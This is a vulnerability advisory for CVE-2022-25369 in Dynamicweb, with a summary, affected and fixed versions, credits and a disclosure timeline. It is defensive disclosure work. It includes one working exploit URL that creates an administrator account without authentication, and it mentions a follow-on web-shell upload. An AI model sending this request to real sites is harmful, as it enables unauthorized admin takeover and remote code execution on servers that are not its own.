Advisory: Dynamicweb Logic Flaw Leading to RCE (CVE-2022-25369)

Summary

An issue was discovered in Dynamicweb before 9.12.8. An attacker can add a new administrator user without authentication. This flaw exists due to a logic issue when determining if the setup phases of the product can be run again.

Impact

Once an attacker is authenticated as the new admin user they have added, it is possible to upload a web shell and achieve command execution.

Version Tested Against

DynamicWeb 9.12.6

Product Description

Dynamicweb offers a cloud based eCommerce suite. Dynamicweb enables customers to deliver better digital customer experiences and to scale ecommerce success through our Content Management, Digital Marketing, Ecommerce, and Product Information Management solutions.

Solution

Hotfixed versions that contain a fix can be found below:

• Dynamicweb 9.5.9
• Dynamicweb 9.6.16
• Dynamicweb 9.7.8
• Dynamicweb 9.8.11
• Dynamicweb 9.9.
• Dynamicweb 9.10.18
• Dynamicweb 9.12.8
• Dynamicweb 9.13.0+

Vulnerabilities

https://target.com/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=admin1&adminpassword=admin1&adminemail=test@test.com&adminname=test

Blog Post

The blog post detailing the steps taken for the discovery of this vulnerability can be found here.

Credits

Assetnote Security Research Team

Timeline

The timeline for this disclosure process can be found below:

• Jan 21st, 2022: Disclosure of pre-auth bug to add admin user
• Jan 21st, 2022: Confirmation and fix information from Dynamicweb CTO
• Jan 24th, 2022: Fixes rolled out to Dynamicweb customers
• Feb 24th, 2022: Published advisory and blog post